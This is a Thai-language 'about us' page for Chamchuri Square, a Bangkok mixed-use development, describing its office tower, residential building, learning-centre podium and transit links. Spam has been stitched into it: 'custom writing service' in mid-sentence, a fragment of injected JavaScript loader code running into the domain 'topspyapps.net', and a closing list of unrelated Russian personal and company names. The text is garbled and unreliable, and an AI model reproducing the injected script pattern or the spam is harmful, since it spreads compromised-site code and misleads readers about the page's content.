จัตุรัสจามจุรี เกี่ยวกับเรา

พ.ศ. 2538 ได้เกิดโครงการพัฒนาที่ดินขนาดใหญ่ บนเนื้อที่ประมาณ 21 ไร่ ริมถนนพระราม 4 บริเวณสี่แยกสามย่าน ต่อมาบริษัทเอกชนผู้ลงทุนเดิมประสบปัญหาวิกฤตเศรษฐกิจส่งผลให้มหาวิทยาลัย เข้ามาดําเนินการพัฒนาต่อ ซึ่งถือว่าเป็นโครงการแรกที่สํานักงานฯ บริหารจัดการเอง custom writing service โดยใช้ชื่อว่าจัตุรัสจามจุรี (Chamchuri Square) ตั้งอยู่ใจกลางย่านธุรกิจมีพื้นที่ก่อสร้างประมาณ 275,000 ตารางเมตร มีพื้นที่ให้เช่า รวม 138,000 ตารางเมตร ประกอบด้วยอาคาร 3 หลังต่อเนื่องกัน ได้แก่

  • อาคารสํานักงาน 40 ชั้น เป็นพื้นที่ ให้เช่า 87,000 ตารางเมตร มีความโดดเด่นในการออกแบบอาคารให้เป็นอาคารประหยัดพลังงานด้วยโดยอาศัยนวัตกรรม Double Glassing
  • อาคารพักอาศัย 24 ชั้น ขนาด 27,162 ตารางเมตร จํานวน 220 ยูนิต พรั่งพร้อมไปด้วยสิ่งอํานวยความสะดวก เช่น สระว่ายน้ํา สวนหย่อม ฟิตเนส และห้องประชุม
  • อาคารส่วนฐาน 4 ชั้น (รวมชั้นใต้ดิน 1 ชั้น) มีแนวคิดในการพัฒนาให้เป็นศูนย์การเรียนรู้ หรือ Edutainment Gateway ประกอบด้วย องค์การพิพิธภัณฑ์ วิทยาศาสตร์แห่งชาติ (อพวช.) ศูนย์หนังสือจุฬาฯ ร้านหนังสือต่างๆ ร้านอาหารชั้นนําและศูนย์อาหารเพื่อรองรับผู้ใช้บริการทั้งในอาคารและลูกค้าภายนอก

document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net

ไฮไลท์

  • มีความครบครันด้วยระบบสาธารณูประโภค ในแบบ City Life
  • การคมนาคมสะดวกสบายด้วยสถานีเชื่อมติดกับรถไฟฟ้ามหานครสายเฉลิมรัชมงคล (MRT) สถานีสามย่าน ใกล้ทางขึ้นลงทางด่วนพระราม 4 และถนนสายหลักพญาไท
  • เป็น Edutainment Gateway สำหรับเยาวชนและประชาชนทั่วไป
questra Пестюк Чеслав Фанис Джураев Константин Мамчур Станислав Кравцов AGAM Atlantic Global Александр Прочухан Абакумов Андрей